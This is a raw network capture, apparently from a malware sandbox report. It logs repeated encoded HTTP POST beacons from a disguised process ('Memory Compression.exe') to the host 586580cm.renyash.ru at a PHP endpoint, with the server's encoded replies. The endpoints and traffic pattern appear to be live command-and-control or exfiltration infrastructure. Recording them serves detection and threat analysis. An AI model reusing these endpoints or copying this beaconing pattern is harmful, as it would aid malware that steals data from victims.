                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z9b5%2BXSZENEtziAJVQq3%2FrF6CSikRB2ytc%2BS0xd65DlwcCNSDmjMJVzosUML4GxljrMcX3GHGYd43LZDuZRc0WXkSdRrYDiIeOh4DdF1CAmQeQxBYekv3F8jHRfhd24uFBWgqADp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057412da086a5c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1805&rtt_var=864&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=571428&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                113192.168.2.550095104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:00.360080957 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:00.705162048 CET1060OUTData Raw: 5f 52 5d 5c 5f 5c 5d 57 5c 5f 50 57 54 57 59 58 59 55 5b 5a 57 54 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _R]\_\]W\_PWTWYXYU[ZWTT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&#<\<!;7>&6+)%=80 )S%?1(5464'=;.^''P*-


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                114192.168.2.550096104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:00.759725094 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:01.111210108 CET1764OUTData Raw: 5f 5e 5d 5a 5f 52 58 54 5c 5f 50 57 54 55 59 58 59 54 5b 51 57 56 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _^]Z_RXT\_PWTUYXYT[QWVT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"' 0_?T<#15'5;)!* &W'(67X 'V=;.^''P*)
                                                                                                                                Jan 11, 2025 15:04:01.231903076 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:01.493371010 CET952INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LNy8vldbDyd27pgTjuvDYzBOknprJ9MrB2Ba281ShPOsE8B2wUSg7aO3CAzbeEqNQN%2BpfdbZp46w%2B4XGcd1rSqzfiWORWKr7Kwh9%2B6vIFaRuBjexR6x6k60ndKh9AB%2BhGom26Ew2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005741b6bb1f5f4-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4218&min_rtt=1618&rtt_var=5807&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2074&delivery_rate=65117&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 5e 35 00 08 12 36 05 25 0e 2a 08 2f 12 30 20 3e 02 3d 31 32 5b 32 05 0a 5b 2d 06 20 52 35 04 30 5c 27 10 2a 06 24 3e 2a 54 3f 11 2c 5d 00 10 20 1c 24 55 2e 05 39 32 21 12 2a 31 3c 40 37 2f 37 17 24 01 26 55 23 30 3f 5d 23 3e 3d 10 38 31 27 14 2e 37 3e 12 3a 38 38 5b 34 0f 2b 55 00 14 20 1a 25 5f 27 02 2a 33 12 56 22 38 3a 5d 33 5d 33 0f 3f 2c 05 0b 2a 06 0b 1e 29 3f 3a 14 37 11 31 59 28 23 38 41 27 0c 2d 57 32 2c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'^56%*/0 >=12[2[- R50\'*$>*T?,] $U.92!*1<@7/7$&U#0?]#>=81'.7>:88[4+U %_'*3V"8:]3]3?,*)?:71Y(#8A'-W2,!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                115192.168.2.550097104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:00.879904032 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:01.236536980 CET1060OUTData Raw: 5f 51 58 5a 5a 58 5d 54 5c 5f 50 57 54 56 59 53 59 57 5b 50 57 51 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _QXZZX]T\_PWTVYSYW[PWQTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"10+2#"='54*9!_=; )50/2U+#!'');.^''P*)
                                                                                                                                Jan 11, 2025 15:04:01.353832960 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:01.596653938 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AjOHs6btmeC0uIJeswAbnEcoAklWjSGWm8ARwWWcDuQ6SsgdiePZ0FXetpFmSfyntClu29vcrBPLQ%2Fwzw%2Fl1BziYqaaFdJw2WQEavJVPI8ydDOjhCLJbLcnRwNZqqjYWnQGyGMl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005741c29fd8c4b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3275&min_rtt=2073&rtt_var=3183&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=124829&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                116192.168.2.550098104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:01.727655888 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:02.080558062 CET1060OUTData Raw: 5f 5e 5d 5d 5f 5b 5d 50 5c 5f 50 57 54 52 59 5e 59 5c 5b 5c 57 52 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _^]]_[]P\_PWTRY^Y\[\WRT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!1 (8#36')%_*; )R$=(&4 4(=;.^''P*
                                                                                                                                Jan 11, 2025 15:04:02.181380033 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:02.451925039 CET797INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:02 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5otCrmFKo2lPYgFb5qpyYnBy5lk1h9e1WkEMcJtmHgYSkzIc%2B3PQJ8VervcUfMXwIl99Y4oXmxWvVYVU9AA3tIqA0KdolwiGB0eGflE3Spr83rSaSNiWd6Aec4WDH1jZOxXb5m5g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574215aa34406-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4469&min_rtt=1666&rtt_var=6232&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=60590&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                117192.168.2.550099104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:02.935199022 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:03.283257961 CET1060OUTData Raw: 5a 57 5d 59 5a 58 58 50 5c 5f 50 57 54 5c 59 53 59 55 5b 5b 57 50 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]YZXXP\_PWT\YSYU[[WPT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_2 (18^#:0>%_+;?#>W$/%(<"'*+.^''P*
                                                                                                                                Jan 11, 2025 15:04:03.397814989 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:03.575829983 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2FNMT9ecGnFd9%2FR9GaVP%2FS4YuIOt9IxV4mOfFZ1vo3NfUoqjlDdxDztwGTQZPc1e3eFkLqC%2ByuUNFchTodlJYdhkbI1XemRNH7Q%2BLgGh%2BmyWUi9KEechWyA8atK0LB8iFaQxWela"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057428fdcb0f5b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2820&min_rtt=1467&rtt_var=3257&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=118737&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                118192.168.2.550100104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:03.708796978 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:04.064713001 CET1060OUTData Raw: 5f 51 5d 5b 5f 58 5d 57 5c 5f 50 57 54 51 59 59 59 57 5b 5f 57 54 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q][_X]W\_PWTQYYYW[_WTTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"1<^( 2>'% ]*%= !)!$:U<'6+>;.^''P*5
                                                                                                                                Jan 11, 2025 15:04:04.163496971 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:04.343813896 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:04 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ntqgdu3f%2FCGwXqfN86j6GM1kDqB9TpkOh0CQ0C3n9qa%2FwsBuQ1CMCfKa52xMTS5DNtFDVpykbPZc57OiczCgrFyoZk9MoDxJKPT9hfTku0UCP75QmrLpW43yTmx7DSSCg%2By%2B25ls"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005742dca9a43f3-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=9127&min_rtt=6838&rtt_var=7143&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=58044&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                119192.168.2.550101104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:04.653038025 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:05.002228975 CET1060OUTData Raw: 5f 5e 58 59 5f 58 58 55 5c 5f 50 57 54 52 59 5f 59 5c 5b 5c 57 51 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _^XY_XXU\_PWTRY_Y\[\WQT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"1/<; W:_'6(_=:!++!9%0,-<@;Z67).^''P*
                                                                                                                                Jan 11, 2025 15:04:05.096820116 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:05.352483034 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLXOtQONqbZtZ9lBu%2BGo8%2F9q67jKBI9u2X%2F0XvlCS7piGmQ%2Bww%2B6upW5ujyL1rLILpc3oVPkT%2FWkq2SepsOlfceNNV3BiXpL2P7vJwIgRKlPYMKP93LdauDng4aS6ZFhBrxFmEFQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005743399a7f5f4-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3075&min_rtt=1659&rtt_var=3454&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=112411&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                120192.168.2.550102104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:05.472220898 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:05.829992056 CET1060OUTData Raw: 5f 51 5d 54 5f 5c 5d 51 5c 5f 50 57 54 5c 59 5b 59 5d 5b 5a 57 50 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]T_\]Q\_PWT\Y[Y][ZWPTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&3<<#41\358^*:5*(T )&U$:R+6_!Q'T=;.^''P*
                                                                                                                                Jan 11, 2025 15:04:05.936877966 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:06.184957027 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:06 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ix9UpuFNcjt7UfT9xo2v0pZ4k0MYwIA%2F758TaLqOgAzniGPteQagu1AgjGYLfgdycT6iHp6be7w%2BlqWbBdEqEC%2BOlnN65cL3cJQCXEy4JQ3zpAuur6dBT98PgxCH6paT3P5tz4B8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057438dd557298-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4303&min_rtt=1964&rtt_var=5416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=70589&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                121192.168.2.550103104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:06.315871954 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                122192.168.2.550104104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:06.508719921 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:06.861195087 CET1776OUTData Raw: 5a 52 5d 5a 5f 5f 5d 51 5c 5f 50 57 54 5d 59 58 59 5d 5b 5d 57 56 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZR]Z__]Q\_PWT]YXY][]WVTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"% ]>!+41'5=)6=8T!9*$?&U(["$#);.^''P*
                                                                                                                                Jan 11, 2025 15:04:06.979861021 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:07.168688059 CET950INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ib0rHWQRIgD9CfdLB%2BspXCOD4dsx2dLLyVsaLHKnXZY6zBnBiIIyrI5t4QLgudyvLEz8ooEVJbtwQtNhOzh4jVkqCHFI%2Fvk%2FfQvO657qIO3YEU9RCEQsb4yY8dnwpH4uDfCXBNmh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005743f5c6343b9-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4538&min_rtt=1711&rtt_var=6297&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=60003&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
